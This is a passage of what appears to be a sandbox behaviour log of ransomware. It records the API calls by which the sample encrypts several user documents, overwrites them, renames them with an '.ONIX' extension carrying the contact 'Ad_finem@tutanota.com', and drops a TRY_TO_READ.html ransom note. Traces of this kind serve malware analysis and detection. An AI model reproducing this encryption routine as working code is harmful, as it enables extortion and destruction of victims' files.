dwFreeType=0x8000) returned 1 [0120.584] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8b80 | out: pbBuffer=0x4d8b80) returned 1 [0120.584] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2780 | out: pbBuffer=0x4b2780) returned 1 [0120.584] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5Fxbu9vadpZOJj.docx", dwFileAttributes=0x80) returned 1 [0120.586] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5Fxbu9vadpZOJj.docx") returned 60 [0120.586] GetProcessHeap () returned 0x410000 [0120.586] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe8) returned 0x467908 [0120.586] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5Fxbu9vadpZOJj.docx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5Fxbu9vadpZOJj.docx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5Fxbu9vadpZOJj.docx" [0120.586] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5Fxbu9vadpZOJj.docx", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5Fxbu9vadpZOJj.docx.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5Fxbu9vadpZOJj.docx.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0120.586] GetFileSizeEx (in: hFile=0x4a8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=64173) returned 1 [0120.586] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0xfaad [0120.586] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0120.586] GetProcessHeap () returned 0x410000 [0120.586] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8c88 [0120.586] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x100) returned 1 [0120.587] WriteFile (in: hFile=0x4a8, lpBuffer=0x4d8c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8c88*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0120.588] WriteFile (in: hFile=0x4a8, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0120.589] WriteFile (in: hFile=0x4a8, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0120.590] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xfaad) returned 0xf50048 [0120.591] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xfaad) returned 0xf5fb00 [0120.591] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.592] ReadFile (in: hFile=0x4a8, lpBuffer=0xf50048, nNumberOfBytesToRead=0xfaad, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50048*, lpNumberOfBytesRead=0x367f44c*=0xfaad, lpOverlapped=0x0) returned 1 [0120.594] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=-64173, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.594] WriteFile (in: hFile=0x4a8, lpBuffer=0xf5fb00*, nNumberOfBytesToWrite=0xfaad, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf5fb00*, lpNumberOfBytesWritten=0x367f44c*=0xfaad, lpOverlapped=0x0) returned 1 [0120.596] UnlockFile (hFile=0x4a8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xfaad, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0120.596] CloseHandle (hObject=0x4a8) returned 1 [0120.597] GetProcessHeap () returned 0x410000 [0120.597] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8c88 | out: hHeap=0x410000) returned 1 [0120.597] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5Fxbu9vadpZOJj.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5fxbu9vadpzojj.docx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5Fxbu9vadpZOJj.docx.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5fxbu9vadpzojj.docx.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0120.599] GetProcessHeap () returned 0x410000 [0120.599] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0120.599] FindNextFileW (in: hFindFile=0x48edf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c8c3180, ftCreationTime.dwHighDateTime=0x1d5a365, ftLastAccessTime.dwLowDateTime=0x272ef210, ftLastAccessTime.dwHighDateTime=0x1d577bd, ftLastWriteTime.dwLowDateTime=0x272ef210, ftLastWriteTime.dwHighDateTime=0x1d577bd, nFileSizeHigh=0x0, nFileSizeLow=0x64b5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5tWMHu7TgypcQ0o2j8.pptx", cAlternateFileName="5TWMHU~1.PPT")) returned 1 [0120.599] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5tWMHu7TgypcQ0o2j8.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5twmhu7tgypcq0o2j8.pptx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a8 [0120.600] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.600] LockFile (hFile=0x4a8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x64b5, nNumberOfBytesToLockHigh=0x0) returned 1 [0120.600] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.600] ReadFile (in: hFile=0x4a8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0120.600] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.601] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.601] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8b80 | out: pbBuffer=0x4d8b80) returned 1 [0120.601] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2780 | out: pbBuffer=0x4b2780) returned 1 [0120.601] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5tWMHu7TgypcQ0o2j8.pptx", dwFileAttributes=0x80) returned 1 [0120.601] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5tWMHu7TgypcQ0o2j8.pptx") returned 64 [0120.601] GetProcessHeap () returned 0x410000 [0120.601] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xf0) returned 0x449878 [0120.601] lstrcpyW (in: lpString1=0x449878, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5tWMHu7TgypcQ0o2j8.pptx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5tWMHu7TgypcQ0o2j8.pptx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5tWMHu7TgypcQ0o2j8.pptx" [0120.601] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5tWMHu7TgypcQ0o2j8.pptx", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5tWMHu7TgypcQ0o2j8.pptx.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5tWMHu7TgypcQ0o2j8.pptx.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0120.601] GetFileSizeEx (in: hFile=0x4a8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=25781) returned 1 [0120.601] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x64b5 [0120.601] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0120.601] GetProcessHeap () returned 0x410000 [0120.601] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8c88 [0120.601] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x100) returned 1 [0120.603] WriteFile (in: hFile=0x4a8, lpBuffer=0x4d8c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8c88*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0120.605] WriteFile (in: hFile=0x4a8, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0120.606] WriteFile (in: hFile=0x4a8, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0120.609] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x64b5) returned 0x4dab68 [0120.609] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x64b5) returned 0x4e1028 [0120.609] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.609] ReadFile (in: hFile=0x4a8, lpBuffer=0x4dab68, nNumberOfBytesToRead=0x64b5, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4dab68*, lpNumberOfBytesRead=0x367f44c*=0x64b5, lpOverlapped=0x0) returned 1 [0120.610] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=-25781, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.610] WriteFile (in: hFile=0x4a8, lpBuffer=0x4e1028*, nNumberOfBytesToWrite=0x64b5, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4e1028*, lpNumberOfBytesWritten=0x367f44c*=0x64b5, lpOverlapped=0x0) returned 1 [0120.612] UnlockFile (hFile=0x4a8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x64b5, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0120.612] CloseHandle (hObject=0x4a8) returned 1 [0120.613] GetProcessHeap () returned 0x410000 [0120.613] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8c88 | out: hHeap=0x410000) returned 1 [0120.613] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5tWMHu7TgypcQ0o2j8.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5twmhu7tgypcq0o2j8.pptx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5tWMHu7TgypcQ0o2j8.pptx.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5twmhu7tgypcq0o2j8.pptx.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0120.616] GetProcessHeap () returned 0x410000 [0120.616] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449878 | out: hHeap=0x410000) returned 1 [0120.616] FindNextFileW (in: hFindFile=0x48edf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2718beb0, ftCreationTime.dwHighDateTime=0x1d5de0a, ftLastAccessTime.dwLowDateTime=0x2c0e7ea0, ftLastAccessTime.dwHighDateTime=0x1d5e148, ftLastWriteTime.dwLowDateTime=0x2c0e7ea0, ftLastWriteTime.dwHighDateTime=0x1d5e148, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6KN_9Ncdw", cAlternateFileName="6KN_9N~1")) returned 1 [0120.616] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6KN_9Ncdw\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\6kn_9ncdw\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a8 [0120.618] FindNextFileW (in: hFindFile=0x48edf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d895640, ftCreationTime.dwHighDateTime=0x1d55fcc, ftLastAccessTime.dwLowDateTime=0x1f0e6b00, ftLastAccessTime.dwHighDateTime=0x1d58c18, ftLastWriteTime.dwLowDateTime=0x1f0e6b00, ftLastWriteTime.dwHighDateTime=0x1d58c18, nFileSizeHigh=0x0, nFileSizeLow=0x92d6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8jfuk_heWwFbM.xlsx", cAlternateFileName="8JFUK_~1.XLS")) returned 1 [0120.618] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8jfuk_heWwFbM.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8jfuk_hewwfbm.xlsx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a8 [0120.618] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.618] LockFile (hFile=0x4a8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x92d6, nNumberOfBytesToLockHigh=0x0) returned 1 [0120.618] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.618] ReadFile (in: hFile=0x4a8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0120.619] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.619] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.619] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8b80 | out: pbBuffer=0x4d8b80) returned 1 [0120.619] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2780 | out: pbBuffer=0x4b2780) returned 1 [0120.619] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8jfuk_heWwFbM.xlsx", dwFileAttributes=0x80) returned 1 [0120.620] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8jfuk_heWwFbM.xlsx") returned 59 [0120.620] GetProcessHeap () returned 0x410000 [0120.620] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe6) returned 0x467908 [0120.620] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8jfuk_heWwFbM.xlsx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8jfuk_heWwFbM.xlsx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8jfuk_heWwFbM.xlsx" [0120.620] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8jfuk_heWwFbM.xlsx", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8jfuk_heWwFbM.xlsx.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8jfuk_heWwFbM.xlsx.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0120.620] GetFileSizeEx (in: hFile=0x4a8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=37590) returned 1 [0120.620] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x92d6 [0120.620] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0120.620] GetProcessHeap () returned 0x410000 [0120.620] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8c88 [0120.620] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x100) returned 1 [0120.620] WriteFile (in: hFile=0x4a8, lpBuffer=0x4d8c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8c88*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0120.621] WriteFile (in: hFile=0x4a8, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0120.622] WriteFile (in: hFile=0x4a8, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0120.623] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x92d6) returned 0x4dab68 [0120.623] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x92d6) returned 0xf50048 [0120.624] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.624] ReadFile (in: hFile=0x4a8, lpBuffer=0x4dab68, nNumberOfBytesToRead=0x92d6, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4dab68*, lpNumberOfBytesRead=0x367f44c*=0x92d6, lpOverlapped=0x0) returned 1 [0120.625] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=-37590, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.625] WriteFile (in: hFile=0x4a8, lpBuffer=0xf50048*, nNumberOfBytesToWrite=0x92d6, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50048*, lpNumberOfBytesWritten=0x367f44c*=0x92d6, lpOverlapped=0x0) returned 1 [0120.627] UnlockFile (hFile=0x4a8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x92d6, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0120.627] CloseHandle (hObject=0x4a8) returned 1 [0120.628] GetProcessHeap () returned 0x410000 [0120.628] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8c88 | out: hHeap=0x410000) returned 1 [0120.628] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8jfuk_heWwFbM.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8jfuk_hewwfbm.xlsx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8jfuk_heWwFbM.xlsx.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8jfuk_hewwfbm.xlsx.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0120.630] GetProcessHeap () returned 0x410000 [0120.630] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0120.630] FindNextFileW (in: hFindFile=0x48edf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc12faae0, ftCreationTime.dwHighDateTime=0x1d5e080, ftLastAccessTime.dwLowDateTime=0xf112b6a0, ftLastAccessTime.dwHighDateTime=0x1d5d8ea, ftLastWriteTime.dwLowDateTime=0xf112b6a0, ftLastWriteTime.dwHighDateTime=0x1d5d8ea, nFileSizeHigh=0x0, nFileSizeLow=0x5b1c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8wZWO4-Rio-5yWN.rtf", cAlternateFileName="8WZWO4~1.RTF")) returned 1 [0120.630] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8wZWO4-Rio-5yWN.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8wzwo4-rio-5ywn.rtf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4a8 [0120.630] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0120.631] LockFile (hFile=0x4a8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x5b1c, nNumberOfBytesToLockHigh=0x0) returned 1 [0120.631] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0120.631] ReadFile (in: hFile=0x4a8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0120.631] SetFilePointerEx (in: hFile=0x4a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0120.631] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0120.632] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8b80 | out: pbBuffer=0x4d8b80) returned 1 [0120.632] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2780 | out: pbBuffer=0x4b2780) returned 1 [0120.632] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8wZWO4-Rio-5yWN.rtf", dwFileAttributes=0x80) returned 1 [0120.632] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8wZWO4-Rio-5yWN.rtf") returned 60 [0120.632] GetProcessHeap () returned 0x410000 [0120.632] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe8) returned 0x467908 [0120.632] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8wZWO4-Rio-5yWN.rtf" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8wZWO4-Rio-5yWN.rtf") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8wZWO4-Rio-5yWN.rtf" [0120.632] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8wZWO4-Rio-5yWN.rtf", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8wZWO4-Rio-5yWN.rtf.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8wZWO4-Rio-5yWN.rtf.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0120.632] GetFileSizeEx (in: hFile=0x4a8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=23324) returned 1 [0120.632] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x5b1c [0120.632] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0120.632] GetProcessHeap () returned 0x410000 [0120.632] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8c88 [0120.632] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x100) returned 1 [0120.634] WriteFile (in: hFile=0x4a8, lpBuffer=0x4d8c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8c88*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0120.636] WriteFile (in: hFile=0x4a8, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0120.637] WriteFile (in: hFile=0x4a8, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: 